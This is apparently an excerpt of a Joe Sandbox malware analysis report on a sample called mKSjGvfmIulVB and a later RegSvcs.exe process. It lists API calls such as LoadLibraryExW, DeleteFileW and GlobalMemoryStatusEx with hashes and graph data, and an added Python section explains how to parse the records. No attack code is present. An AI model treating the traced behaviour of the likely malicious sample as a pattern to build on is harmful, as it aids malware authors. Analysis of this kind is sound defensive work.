                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 054459A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: b8b82deb4e804f709d36471f974886b1c59d1b05209bcc5a43b37a6bb5daa132
                                                                      • Instruction ID: da6e39b4fe9688976ec853dda146ecc0ebf4945dee61c993982632ec9bc456ed
                                                                      • Opcode Fuzzy Hash: b8b82deb4e804f709d36471f974886b1c59d1b05209bcc5a43b37a6bb5daa132
                                                                      • Instruction Fuzzy Hash: 55419DB0D00619CBDB24DFA9C884BDEFBB5BF49304F20805AD409AB255DB756949CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 054459A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 429adefea53c57512b8244e979b8ab26881a9bfefc347e12a5c1bf0d097cdedc
                                                                      • Instruction ID: b0ad74284499b58004a4cb47419cc1cc1bf03bf1a25f32f0130439561355866d
                                                                      • Opcode Fuzzy Hash: 429adefea53c57512b8244e979b8ab26881a9bfefc347e12a5c1bf0d097cdedc
                                                                      • Instruction Fuzzy Hash: 98419DB0D00719CBDB24DFA9C884BDEFBB6BF49304F20806AD409AB255DB756949CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 486 544dbe0-544dc74 DuplicateHandle 487 544dc76-544dc7c 486->487 488 544dc7d-544dc9a 486->488 487->488
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544DC67
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 1b391aba917c1dff307d27d33252c55affb50aff8c813b2e848a56db6e203345
                                                                      • Instruction ID: 2fd8a1b39b29230fa84dfc315d19bfc4a17329ec9dc74dbb7fe2a6945f055d93
                                                                      • Opcode Fuzzy Hash: 1b391aba917c1dff307d27d33252c55affb50aff8c813b2e848a56db6e203345
                                                                      • Instruction Fuzzy Hash: E121B0B5D002499FDB10CFAAD984ADEBBF9EB48310F14841AE918A3350D379A954CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 491 544ac60-544bbc8 493 544bbd0-544bbff LoadLibraryExW 491->493 494 544bbca-544bbcd 491->494 495 544bc01-544bc07 493->495 496 544bc08-544bc25 493->496 494->493 495->496
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0544B9E1,00000800,00000000,00000000), ref: 0544BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: b9a54bffd4351a080f308ffe87f6b4391d1da7d71f509174a1a267820c6e7d56
                                                                      • Instruction ID: 73c75d9080219047f41d96fcbd712f196702918496a32d273871635236777027
                                                                      • Opcode Fuzzy Hash: b9a54bffd4351a080f308ffe87f6b4391d1da7d71f509174a1a267820c6e7d56
                                                                      • Instruction Fuzzy Hash: E611E4B6D043499FDB20CF9AD448ADEFBF8EB58310F10846EE519A7600C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 499 544bb80-544bbc8 500 544bbd0-544bbff LoadLibraryExW 499->500 501 544bbca-544bbcd 499->501 502 544bc01-544bc07 500->502 503 544bc08-544bc25 500->503 501->500 502->503
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0544B9E1,00000800,00000000,00000000), ref: 0544BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 79a6bf850424296bd75ea06b328e505055d61d62abefcdc85feec88bba05e183
                                                                      • Instruction ID: 57a6012b7eabeff083a6b30092953fdd098d2858da321bceb92100a022c5ac44
                                                                      • Opcode Fuzzy Hash: 79a6bf850424296bd75ea06b328e505055d61d62abefcdc85feec88bba05e183
                                                                      • Instruction Fuzzy Hash: AD11D0B6D002498FDB14CF9AD548ADEFBF8AB88310F14841AD419A7600C379A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 506 76236b8-762372a PostMessageW 508 7623733-7623747 506->508 509 762372c-7623732 506->509 509->508
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0762371D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134844078.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7620000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 2daebcba8b3e40d417be79e860c049c07f249f7c76e6d8792ea521912414a630
                                                                      • Instruction ID: d30f46565bd29487ddcfd7c02993399263a10a34bcdaeac912e7309ebc11eef9
                                                                      • Opcode Fuzzy Hash: 2daebcba8b3e40d417be79e860c049c07f249f7c76e6d8792ea521912414a630
                                                                      • Instruction Fuzzy Hash: 3011E3B5800349DFDB20DF9AD485BDEBBF8EB59310F20841AE555A7600C375A584CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 511 544b900-544b940 512 544b942-544b945 511->512 513 544b948-544b973 GetModuleHandleW 511->513 512->513 514 544b975-544b97b 513->514 515 544b97c-544b990 513->515 514->515
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0544B966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: aab9964864674e1874bca59f53b0bec691574fa58748b06281d03e9574f829cf
                                                                      • Instruction ID: d766ba64a8121f98a7c69c7fc1cf9750a9304ac2e2d9c031c971d3cf4ff55028
                                                                      • Opcode Fuzzy Hash: aab9964864674e1874bca59f53b0bec691574fa58748b06281d03e9574f829cf
                                                                      • Instruction Fuzzy Hash: EA11DFB5C002498FDB20DF9AD444ADEFBF4EB88224F10845AD859B7710C379A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 517 76218f0-762372a PostMessageW 519 7623733-7623747 517->519 520 762372c-7623732 517->520 520->519
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0762371D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134844078.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7620000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: b8279859a9b907730f9fb5f8850f702294506db5f52f56bf718aa58bacde0634
                                                                      • Instruction ID: e791a45f6a099bdfe5c74d22ff49584987d988f28e2511e0b4947e4b4ec048ee
                                                                      • Opcode Fuzzy Hash: b8279859a9b907730f9fb5f8850f702294506db5f52f56bf718aa58bacde0634
                                                                      • Instruction Fuzzy Hash: 6811F2B58007599FDB20DF9AD488BDEFBF8EB49310F10841AE519A7710C379A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d280d0004c13a58de9ac6af5d1fb6e60e18495c1181f30bea874beffb0c3088d
                                                                      • Instruction ID: ef6c1d5c1f5f292172130a32ac07cb984757b417b211d8d7c9006d7fa0fef586
                                                                      • Opcode Fuzzy Hash: d280d0004c13a58de9ac6af5d1fb6e60e18495c1181f30bea874beffb0c3088d
                                                                      • Instruction Fuzzy Hash: FC21C4B1504344DFDB06EF98D9C4B26BF65FB88328F24C569ED054A686C336D416CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a7faac438457ba8903a7779118c8cb364a185d3e1f134873ddc69920f896975
                                                                      • Instruction ID: e20f7d0f7333f127e659c15614cff7975b652387d810f21aeebcef7fb09b991e
                                                                      • Opcode Fuzzy Hash: 4a7faac438457ba8903a7779118c8cb364a185d3e1f134873ddc69920f896975
                                                                      • Instruction Fuzzy Hash: F821C1B1504344EFDB05EF58D9C0B26BF65FB8831CF24C56AE9090B696C336D456CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94baaf5df84a828c7604d777ef50b0f069d1b0e0184fdd580339a84d9321e4b2
                                                                      • Instruction ID: 132f18db6b40dedf0fe06822201932e86bd61fb498961d6c709ef9452d11ebb7
                                                                      • Opcode Fuzzy Hash: 94baaf5df84a828c7604d777ef50b0f069d1b0e0184fdd580339a84d9321e4b2
                                                                      • Instruction Fuzzy Hash: AF2122B1604204DFDF15DFA8D9C5B26BBA5FB84358F24C56DD80A0B346C33AD807CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b61e50198832a2c15d22ab7d2e64351b43c0419e878328d0449d161f5466b80f
                                                                      • Instruction ID: 2e8db90dcac33d824a15dd51f913f958a18372362434a1d08011749b1575ea2e
                                                                      • Opcode Fuzzy Hash: b61e50198832a2c15d22ab7d2e64351b43c0419e878328d0449d161f5466b80f
                                                                      • Instruction Fuzzy Hash: 662126B1504204EFDF05DF98D9C1B26BBA5FB84328F24C5ADE9894B396C336D406CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                                      • Instruction ID: 2b88328980c33095de1100bb508500bba40291a7b821cba9dc07d001912ee24f
                                                                      • Opcode Fuzzy Hash: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                                                      • Instruction Fuzzy Hash: 3421CD76404244CFDB06DF44D9C4B16BF62FB84324F24C2A9DD084A696C33AD42ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction ID: d15fb2454bb87deaacbc3245d414ec26bde6e8556e14990a0bded44a179959b5
                                                                      • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction Fuzzy Hash: 6A11E172404380CFCB02DF54D5C4B16BF71FB84318F24C6AAD8490B656C336D45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: 88414a4b719266cde7d45b3cab849dd8bfa4f995e0cc3d58a5782282013f280a
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: 4911BB75904280DFDB02CF58D5C4B15BBB1FB84228F24C6A9D8894B696C33AD40ACB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: 1889d02d8d516042506830592ea109cd8b38e809818db92603c07bbf2fe18d96
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: A111BB75504280CFDB12CF58D5C4B15BBA2FB84318F24C6AAD8494B756C33AD40ACBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57efb61101d81ad0c916faf43837e79fc0db715dc60c338de0dec5434176cf13
                                                                      • Instruction ID: b721a192b709205219ae476abde5c8f87e109f79663a4d049fd46b3161ad147a
                                                                      • Opcode Fuzzy Hash: 57efb61101d81ad0c916faf43837e79fc0db715dc60c338de0dec5434176cf13
                                                                      • Instruction Fuzzy Hash: 6001A7710043849AE7107F99DDC4B66FF9CDF41368F18C51AFD094A2C6D2799845C671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2120650814.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_138d000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a4302b9a806e5f9dcffe13af8973d63474207ced92736d231cb6e6a9dbe17b0
                                                                      • Instruction ID: 87ea8c2150ae5423af52c0f9c2ab323f5a6df6485b7ccfad1a72eb71a9a5317b
                                                                      • Opcode Fuzzy Hash: 6a4302b9a806e5f9dcffe13af8973d63474207ced92736d231cb6e6a9dbe17b0
                                                                      • Instruction Fuzzy Hash: ECF0C2714043809EE710AF5ACC88B62FF98EB41238F18C45AFD084A286C3799844CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:8.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:20
                                                                      Total number of Limit Nodes:4
                                                                      execution_graph 25028 2e77350 25029 2e77396 DeleteFileW 25028->25029 25031 2e773cf 25029->25031 25032 2e70848 25034 2e7084e 25032->25034 25033 2e7091b 25034->25033 25036 2e71393 25034->25036 25038 2e713a6 25036->25038 25037 2e714b4 25037->25034 25038->25037 25040 2e77528 25038->25040 25041 2e77532 25040->25041 25042 2e7754c 25041->25042 25045 5cdd69f 25041->25045 25049 5cdd6b0 25041->25049 25042->25038 25047 5cdd6b0 25045->25047 25046 5cdd8da 25046->25042 25047->25046 25048 5cdd8f0 GlobalMemoryStatusEx 25047->25048 25048->25047 25051 5cdd6c5 25049->25051 25050 5cdd8da 25050->25042 25051->25050 25052 5cdd8f0 GlobalMemoryStatusEx 25051->25052 25052->25051
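The records on this page are machine output, and the quickest way to work with them is to parse them rather than read them. The Python below is an added example (not Joe Sandbox code) that reads three of the records above, copied verbatim, plus the execution_graph line, and recovers what a triage analyst wants from them: the call-site address behind each API reference, the process index (the first dotted field of the .sdmp name is hex, so 0000000B is process 11, which matches hcaresult_11_2 in the snapshot name, just as 0000000E matches hcaresult_14_2 further down), Opcode IDs that recur with different Instruction IDs (same opcode skeleton, different operands, as with the two 5ecdbd21... records), and which APIs a given execution-graph root reaches (DeleteFileW from 25028, GlobalMemoryStatusEx from 25032). The field names and the token grammar for the graph line are assumptions drawn from the layout shown on this page, not a documented format.

```python
import re
from collections import defaultdict, deque

# Constructed sample: three records copied verbatim from this report, in the page's own layout.
SAMPLE = """
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544DC67
• Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
• Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
• API ID: DuplicateHandle
• Opcode ID: 1b391aba917c1dff307d27d33252c55affb50aff8c813b2e848a56db6e203345
• Instruction ID: 2fd8a1b39b29230fa84dfc315d19bfc4a17329ec9dc74dbb7fe2a6945f055d93
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
• Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
• API ID:
• Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
• Instruction ID: 88414a4b719266cde7d45b3cab849dd8bfa4f995e0cc3d58a5782282013f280a
Uniqueness Score: -1.00%
• Source File: 0000000B.00000002.2120716906.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
• Snapshot File: hcaresult_11_2_139d000_mKSjGvfmIulVB.jbxd
• API ID:
• Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
• Instruction ID: 1889d02d8d516042506830592ea109cd8b38e809818db92603c07bbf2fe18d96
Uniqueness Score: -1.00%
"""
# The execution_graph line of this report, copied verbatim.
EXEC_GRAPH = "execution_graph 25028 2e77350 25029 2e77396 DeleteFileW 25028->25029 25031 2e773cf 25029->25031 25032 2e70848 25034 2e7084e 25032->25034 25033 2e7091b 25034->25033 25036 2e71393 25034->25036 25038 2e713a6 25036->25038 25037 2e714b4 25037->25034 25038->25037 25040 2e77528 25038->25040 25041 2e77532 25040->25041 25042 2e7754c 25041->25042 25045 5cdd69f 25041->25045 25049 5cdd6b0 25041->25049 25042->25038 25047 5cdd6b0 25045->25047 25046 5cdd8da 25046->25042 25047->25046 25048 5cdd8f0 GlobalMemoryStatusEx 25047->25048 25048->25047 25051 5cdd6c5 25049->25051 25050 5cdd8da 25050->25042 25051->25050 25052 5cdd8f0 GlobalMemoryStatusEx 25051->25052 25052->25051"

API_RE = re.compile(r"^•?\s*(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•?\s*(Source File|Snapshot File|API ID|Opcode ID|Instruction ID):\s*(.*)$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

def parse_records(text):
    """One dict per function record; a record ends at its 'Uniqueness Score' line."""
    records, cur = [], {"apis": []}
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("Uniqueness Score"):
            if "opcode_id" in cur:
                records.append(cur)
            cur = {"apis": []}
            continue
        m = API_RE.match(line)
        if m:                      # (function, module, argument list, call-site address)
            cur["apis"].append((m.group(1), m.group(2), m.group(3), m.group(4)))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m.group(1).lower().replace(" ", "_")] = m.group(2)
    if "opcode_id" in cur:         # a record cut off before its terminator (as at the end of this page)
        records.append(cur)
    return records

def process_index(rec):
    """First dotted field of the .sdmp name is the process index in hex (0000000B -> 11)."""
    return int(rec["source_file"].split(".")[0], 16)

def snapshot_index(rec):
    # The snapshot name carries the same index in decimal: hcaresult_<index>_<stage>_...
    return int(rec["snapshot_file"].split("_")[1])

def shared_opcodes(records):
    """Opcode IDs seen with more than one Instruction ID: same opcode skeleton, different operands."""
    by_opcode = defaultdict(set)
    for r in records:
        by_opcode[r["opcode_id"]].add(r["instruction_id"])
    return {k: sorted(v) for k, v in by_opcode.items() if len(v) > 1}

def parse_execution_graph(line):
    """Assumed token grammar: <node id> <hex address> [<API name>...] and <a>-><b> edges, in any order."""
    nodes, edges, cur, expect_addr = {}, [], None, False
    for tok in line.split()[1:]:               # skip the leading 'execution_graph' label
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif expect_addr:                      # the token right after a node id is its address
            nodes[cur]["addr"] = int(tok, 16)
            expect_addr = False
        elif tok.isdigit():                    # a bare decimal number opens a new node
            cur = int(tok)
            nodes[cur] = {"addr": None, "apis": []}
            expect_addr = True
        else:                                  # anything else is an API called from that node
            nodes[cur]["apis"].append(tok)
    return nodes, edges

def reachable_apis(nodes, edges, root):
    """Breadth-first walk from root; returns the set of API names on every reachable node."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        apis.update(nodes.get(n, {}).get("apis", []))
        for nxt in succ[n]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return apis
```

Run `parse_records` over the whole "Control-flow Graph" section of a report and `parse_execution_graph` over its execution_graph line; the node count from the graph parse should equal the "Total number of Nodes" the report states (20 here), which is a cheap check that the token grammar held for that page.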

                                                                      Control-flow Graph (rendered graphically in the original; the executed / not-executed colouring of the blocks is not recoverable here)
                                                                      Function 5cde4b8-5cde645: the entry block branches to a call of 5cddcd8 (block 5cde4d5-5cde4fc) or 5cddce4 (block 5cde4fd-5cde51c); a loop over blocks 5cde557-5cde572 follows; GlobalMemoryStatusEx is called in block 5cde5a5-5cde614, after which both successor blocks merge at 5cde61d-5cde645.
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3251996337.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_5cd0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3b96d103e4b061a4c2c37f714c9e8777f5ab06ba70c00f1ad09d87b8c485754
                                                                      • Instruction ID: 47bd83161fac3cf24d14e72135563bd40f26a12186550c926d7cbb4483d3967a
                                                                      • Opcode Fuzzy Hash: d3b96d103e4b061a4c2c37f714c9e8777f5ab06ba70c00f1ad09d87b8c485754
                                                                      • Instruction Fuzzy Hash: A9414871D0839A8FCB10CFA9D8046AEFFF5AF89210F1485ABD505EB241EB749845CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (rendered graphically in the original; the executed / not-executed colouring of the blocks is not recoverable here)
                                                                      Function 2e77348-2e773fe: DeleteFileW is called in block 2e773a2-2e773cd; the two successor blocks (2e773cf-2e773d5 and the fall-through) merge at 2e773d6-2e773fe.
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02E773C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245651258.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_2e70000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 83253bbd86f2e849a89ecdc760d0f260ca2668f4374351a34bc69d645b4861cd
                                                                      • Instruction ID: 830248ab0119daa24f270c658ffdc867d6c01941f727d626a15b6dad404355d6
                                                                      • Opcode Fuzzy Hash: 83253bbd86f2e849a89ecdc760d0f260ca2668f4374351a34bc69d645b4861cd
                                                                      • Instruction Fuzzy Hash: CD215BB1C0065A9FCB10CFAAD445ADEFBB0BF48324F158269D858B7240D3346944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (rendered graphically in the original; the executed / not-executed colouring of the blocks is not recoverable here)
                                                                      Function 2e77350-2e773fe: DeleteFileW is called in block 2e773a2-2e773cd; the two successor blocks (2e773cf-2e773d5 and the fall-through) merge at 2e773d6-2e773fe.
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02E773C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245651258.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_2e70000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: d8cb315835c7541a73103a56a310461d5483466ca3ec1de1cded4be192293630
                                                                      • Instruction ID: b22ec4759a99835b9631e91a0e1111a650df526f92f36ba340e53be9993e74ed
                                                                      • Opcode Fuzzy Hash: d8cb315835c7541a73103a56a310461d5483466ca3ec1de1cded4be192293630
